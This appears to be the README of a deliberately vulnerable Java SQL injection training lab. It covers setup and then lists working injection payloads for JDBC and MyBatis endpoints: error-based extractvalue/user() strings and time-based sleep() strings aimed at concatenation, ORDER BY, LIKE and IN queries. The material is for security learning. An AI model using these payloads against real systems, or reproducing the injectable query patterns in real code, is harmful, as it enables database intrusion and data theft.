/JavaSec-SQLInject-Demo

SQLInject

Primary LanguageJavaApache License 2.0Apache-2.0

Java-SQL注入靶场

部署

修改src/main/resources/application-dev.yml中的数据库信息

image-20220912214641993

将表导入数据库src/main/resources/user.sql

image-20220912214725961

一、JDBC

src/main/java/com/uzju/dongtai_sql_inject_lab/controller/JDBCInject.java

1、+号拼接

1.1、PAYLOAD

/jdbc/statement_and_inject?id=1'+and+extractvalue(1,concat(0x7e,user()))--+

image-20220911211335064

1.2、实现代码

image-20220911211433982

2、prepareStatement注入+号拼接

2.1、PAYLOAD

/jdbc/preparestatement_and_inject?id=1'+and+extractvalue(1,concat(0x7e,user()))--+

image-20220911211718206

2.2、实现代码

image-20220911213628419

3、prepareStatement Orderby注入

3.1、PAYLOAD

/jdbc/preparestatement_orderby_inject?id=1&orderby=id+and+extractvalue(1,concat(0x7e,user()))

image-20220911213751260

3.2、代码实现

image-20220911213808120

4、prepareStatement like注入

4.1、PAYLOAD

/jdbc/preparestatement_like_inject?id=1%25'+and+extractvalue(1,concat(0x7e,user()))--+

image-20220911213920154

4.2、代码实现

image-20220911213958343

5、prepareStatement in注入

5.1、PAYLOAD

/jdbc/preparestatement_in_inject?id=1)+and+extractvalue(1,concat(0x7e,user()))--+

image-20220911214118938

5.2、代码实现

image-20220911214054339

二、Mybatis

1、mybatis ${}注入

1.1、PAYLOAD

/mybatis/getUser_inject?id=1+and+sleep(3)

image-20220912214228801

2、mybatis orderby注入

2.1、PAYLOAD

/mybatis/getUser_orderby_inject?id=1&getparse=id+and+if(1=1,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))

image-20220912214045899

3、mybatis like注入

3.1、PAYLOAD

/mybatis/getUser_like_inject?id=1&username=admin'+and+sleep(3)--+

image-20220912214345378

4、mybatis in注入

4.1、PAYLOAD

/mybatis/getUser_in_inject?id=1)+and+sleep(3)--+

image-20220912214436618